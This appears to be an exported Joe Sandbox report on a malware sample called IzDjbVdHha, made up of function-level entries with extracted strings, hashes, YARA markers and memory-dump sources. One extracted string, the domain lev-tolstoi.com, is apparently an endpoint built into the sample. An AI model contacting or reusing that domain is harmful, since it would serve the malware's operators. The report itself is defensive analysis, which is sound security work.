Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
Instruction ID: 783c45dd57376c1bd002455fb96c41a8d2ce99f9c83db506c6f0435d01e22400
Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
Instruction Fuzzy Hash: AF5186B7F102180BD71CAEBACC5A7AA75878BC5710F1E813D5949DB3D6EDB88C0182D5

Function 00427603 Relevance: 7.0, Strings: 5, Instructions: 702COMMON

Download Yara Rule

Strings

|B, xrefs: 00427CB6
+K M, xrefs: 00427888
B~B, xrefs: 00427DD2
)G+I, xrefs: 00427880
s0u, xrefs: 00427898

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: )G+I$+K M$B~B$|B$s0u
API String ID: 0-2670551875
Opcode ID: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
Instruction ID: a4cd9e1bca78e5d66c5ba9b7c65c08060f0057a840f0996e05fe944024406416
Opcode Fuzzy Hash: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
Instruction Fuzzy Hash: 6C321175A08350CFD714CF28E85072EBBE2BF8A314F194A7DE89957392D7349805CB9A

Function 0041E7C0 Relevance: 5.8, Strings: 4, Instructions: 779COMMON

Download Yara Rule

Strings

-+, xrefs: 0041F11A
", xrefs: 0041F121
/, xrefs: 0041E9BE
hI, xrefs: 0041E98F

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: "$-+$/$hI
API String ID: 0-2772680581
Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A

Function 009FEA27 Relevance: 5.8, Strings: 4, Instructions: 779COMMON

Download Yara Rule

Strings

", xrefs: 009FF388
hI, xrefs: 009FEBF6
/, xrefs: 009FEC25
-+, xrefs: 009FF381

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: "$-+$/$hI
API String ID: 0-2772680581
Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
Instruction ID: 4d99c98ac41a2ddb5b879ad42647e312325a383a84fb8c10445fda0e67bc01a1
Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
Instruction Fuzzy Hash: 1342357550C3858FC721CF25C850A7EBBE1AF92314F188A6CE9E85B392D735D906CB52

Function 009FD230 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

xy, xrefs: 009FD4A5
qr, xrefs: 009FD2CA
0u4w, xrefs: 009FD49D
_q, xrefs: 009FD42C

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: 0u4w$_q$qr$xy
API String ID: 0-1225007230
Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
Instruction ID: ee5635f7acd71ff40e0174b5d68982a3a49d9b7d3b01df3bb89115f1cfe608f9
Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
Instruction Fuzzy Hash: 2C9100B1A083158BC714CF58C89277BB3F2EF95324F18992CE9CA8B391E3789905C756

Function 0042CA49 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96

Function 0042CB22 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96

Function 0042CAD0 Relevance: 5.3, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96

Function 0042CB11 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96

Function 00A04031 Relevance: 5.1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

Strings

{\}, xrefs: 00A040A5
Fg)i, xrefs: 00A040BD
/G$I, xrefs: 00A0407D
7N1@, xrefs: 00A04137, 00A04148

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: /G$I$7N1@$Fg)i${\}
API String ID: 0-149357369
Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
Instruction ID: b374d4a5a7f7e2e7e084660db9a62a71e4bd1d2ce276b689f4a910b495177c4d
Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
Instruction Fuzzy Hash: B521B8B54193809BC314CF66984161BFBE2BBD2704F29A92CF0C85B295D3748902CF8B

Function 00417DEE Relevance: 4.7, Strings: 3, Instructions: 998COMMON

Download Yara Rule

Strings

r}A, xrefs: 00417D60
i, xrefs: 00417B2A
,, xrefs: 004183A1

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: InitializeThunk
String ID: ,$i$r}A
API String ID: 2994545307-2114006112
Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796

Function 0041759F Relevance: 4.4, Strings: 3, Instructions: 671COMMON

Download Yara Rule

Strings

r}A, xrefs: 00417D60
i, xrefs: 00417B2A
gfff, xrefs: 00417747

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: gfff$i$r}A
API String ID: 0-3931832132
Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786

Function 00422510 Relevance: 4.2, Strings: 3, Instructions: 454COMMON

Download Yara Rule

Strings

y./, xrefs: 00422715
<pr, xrefs: 00422536
st, xrefs: 0042253E

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: <pr$st$y./
API String ID: 0-3839595785
Opcode ID: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
Instruction ID: 75883d3ccedddef3a45dabbf5554b36173ac4c5341f315a2b5b284ed2e941cbb
Opcode Fuzzy Hash: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
Instruction Fuzzy Hash: A6C16872B083206BD7149B25D95263BB3E1EFD4314F59852EE88697381E6BCD805C39A

Function 00A02777 Relevance: 4.2, Strings: 3, Instructions: 454COMMON

Download Yara Rule

Strings

<pr, xrefs: 00A0279D
st, xrefs: 00A027A5
y./, xrefs: 00A0297C

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: <pr$st$y./
API String ID: 0-3839595785
Opcode ID: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
Instruction ID: 12a181a405c35d3bec1b1b264b747e1dfdce8961288105a67d29c646393bcbef
Opcode Fuzzy Hash: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
Instruction Fuzzy Hash: 78C15972A083054BDB28DF29D85676BB3E1EFD5350F19892DE99A87381E738DC05C392

Function 0041D380 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

34, xrefs: 0041D46A
C], xrefs: 0041D471
|F, xrefs: 0041D40A

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A

Function 009FD5E7 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

|F, xrefs: 009FD671
34, xrefs: 009FD6D1
C], xrefs: 009FD6D8

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
Opcode ID: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
Instruction ID: 5db5f3fe57668d1b42b58765f9ae6f60603d88bd8c9636c52af20b6f0f2e9c83
Opcode Fuzzy Hash: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
Instruction Fuzzy Hash: 9EC12EB69093558BC720CF28C88167BB3F2FF95314F18895CE9D58B390E774AA05CB92

Function 00418792 Relevance: 4.1, Strings: 3, Instructions: 378COMMON

Download Yara Rule

Strings

#XXL, xrefs: 00418808, 00418BDB
=, xrefs: 004187A4
BC, xrefs: 004189F6

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: #XXL$=$BC
API String ID: 0-2546488661
Opcode ID: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
Instruction ID: 9bd2012f957da0ff56630068cab070879dad6f1475f4ae026007fe123ff5be4b
Opcode Fuzzy Hash: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
Instruction Fuzzy Hash: 62C1EBB15083518BD324CF15C8A17ABBBE2FFD1704F0A895ED4C55B3A1EBB88845CB96

Function 0043F720 Relevance: 4.1, Strings: 3, Instructions: 364COMMON

Download Yara Rule

Strings

1234, xrefs: 0043F774
oQ3, xrefs: 0043F943
sQ3, xrefs: 0043F979

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: InitializeThunk
String ID: 1234$oQ3$sQ3
API String ID: 2994545307-3057079318
Opcode ID: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
Instruction ID: 8038275947b79c29346f8cf0c7e67bd1178385f5d69ec54105c16415a8137388
Opcode Fuzzy Hash: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
Instruction Fuzzy Hash: 8DB16472A083118FC728DF28C89056BB7E2EBC9314F19853DE99697365E735ED05CB82

Function 00A1F987 Relevance: 4.1, Strings: 3, Instructions: 364COMMON

Download Yara Rule

Strings

sQ3, xrefs: 00A1FBE0
12347, xrefs: 00A1FA21, 00A1FB28
oQ3, xrefs: 00A1FBAA

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: 12347$oQ3$sQ3
API String ID: 0-1755585375
Opcode ID: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
Instruction ID: 8100a1eb96e3d4d32fe886e283e0b079bf22841513bd910d348881e99e9d509e
Opcode Fuzzy Hash: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
Instruction Fuzzy Hash: 00B14632A087918FC718CF28D8919ABB7E2EBD5314F1A853CE99697351D731ED81C782

Function 0042DFE9 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

TQ][, xrefs: 0042E307
sWK), xrefs: 0042E049
Ef, xrefs: 0042E24E

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: Ef$TQ][$sWK)
API String ID: 0-3401374238
Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7

Function 00A0E250 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

Ef, xrefs: 00A0E4B5
sWK), xrefs: 00A0E2B0
TQ][, xrefs: 00A0E56E

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: Ef$TQ][$sWK)
API String ID: 0-3401374238
Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
Instruction ID: 76ed9a17794adec7bbabbf1d990e697ec4d3c88aeaf768918ff4190872ec0de2
Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
Instruction Fuzzy Hash: 00B1BE305193D08ADB39CF2994907ABBBE09FA7304F088D9DD4D95B282DB75850ADB63

Function 0041B2E0 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

_, xrefs: 0041B428
/pqr, xrefs: 0041B30E
+|-~, xrefs: 0041B306

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D

Function 009FB547 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

+|-~, xrefs: 009FB56D
_, xrefs: 009FB68F
/pqr, xrefs: 009FB575

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
Instruction ID: 296fc479efce49327cd376730cac2eda5bb6516f46b355030e33ca906da4efda
Opcode Fuzzy Hash: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
Instruction Fuzzy Hash: A2813C556045C006DB2DDF7888A373BBAD69FC4308B2991BEC955CFBA7E938C502874D

Function 009E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 009E0966
., xrefs: 009E095F
GetProcAddress., xrefs: 009E09DC, 009E09DF, 009E09E4

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: e7df28c795b5d5d6bb707880e7510df8e26bbd12ea004c9f38b556de3a969cf7
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 7B315CB6900649DFDB11CF99C880AADBBF9FF48324F14404AD441A7352D7B5EA85CBA4

Function 00425327 Relevance: 3.2, Strings: 2, Instructions: 742COMMON

Download Yara Rule

Strings

9YB, xrefs: 00425933
"51s, xrefs: 004253CB

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: "51s$9YB
API String ID: 0-2722061943
Opcode ID: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
Instruction ID: 779a5c1bb40158b59da43047085edf677e041d4ba635d65d9609cd33f89ab022
Opcode Fuzzy Hash: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
Instruction Fuzzy Hash: EE321976B00622CBCB24CF68D8516BFB3B2FF89310B99856DD442AB364DB395D41CB54

Function 0040DBD9 Relevance: 3.0, Strings: 2, Instructions: 528COMMON

Download Yara Rule

Strings

Dx, xrefs: 0040E139
lev-tolstoi.com, xrefs: 0040DF76, 0040E316

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: Dx$lev-tolstoi.com
API String ID: 0-818776348
Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97

Function 0042DA53 Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

0K), xrefs: 0042DF19
4*VP, xrefs: 0042DF24

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: 0K)$4*VP
API String ID: 0-3626284114
Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66

Function 004231C2 Relevance: 2.9, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

R2B, xrefs: 0042321B, 0042323E
6B, xrefs: 004236D0

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: R2B$6B
API String ID: 0-20043878
Opcode ID: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
Instruction ID: f5db2046e1d380e536cc29ae1ea4695f6a7d49829660d0c0f3bd76f15908f1aa
Opcode Fuzzy Hash: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
Instruction Fuzzy Hash: 3AD1C276A01116CFDB18CF68DC917AE73B2FB8A311F1A85A9D841E7390DB34AD11CB58

Function 00420F50 Relevance: 2.9, Strings: 2, Instructions: 429COMMON

Download Yara Rule

Strings

|}, xrefs: 004212E7
XG, xrefs: 0042101C

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: XG$|}
API String ID: 0-1014376750
Opcode ID: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
Instruction ID: fef0f9a3622c059bd3dca30c9da84c32a684abbcbc54a65241ce9b590edefb0f
Opcode Fuzzy Hash: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
Instruction Fuzzy Hash: ECD122B16083108BD724DF18D8927ABB7F2FFE5354F49891DE5868B3A1E7788801CB56

Function 00A011B7 Relevance: 2.9, Strings: 2, Instructions: 429COMMON

Download Yara Rule

Strings

XG, xrefs: 00A01283
|}, xrefs: 00A0154E

Memory Dump Source

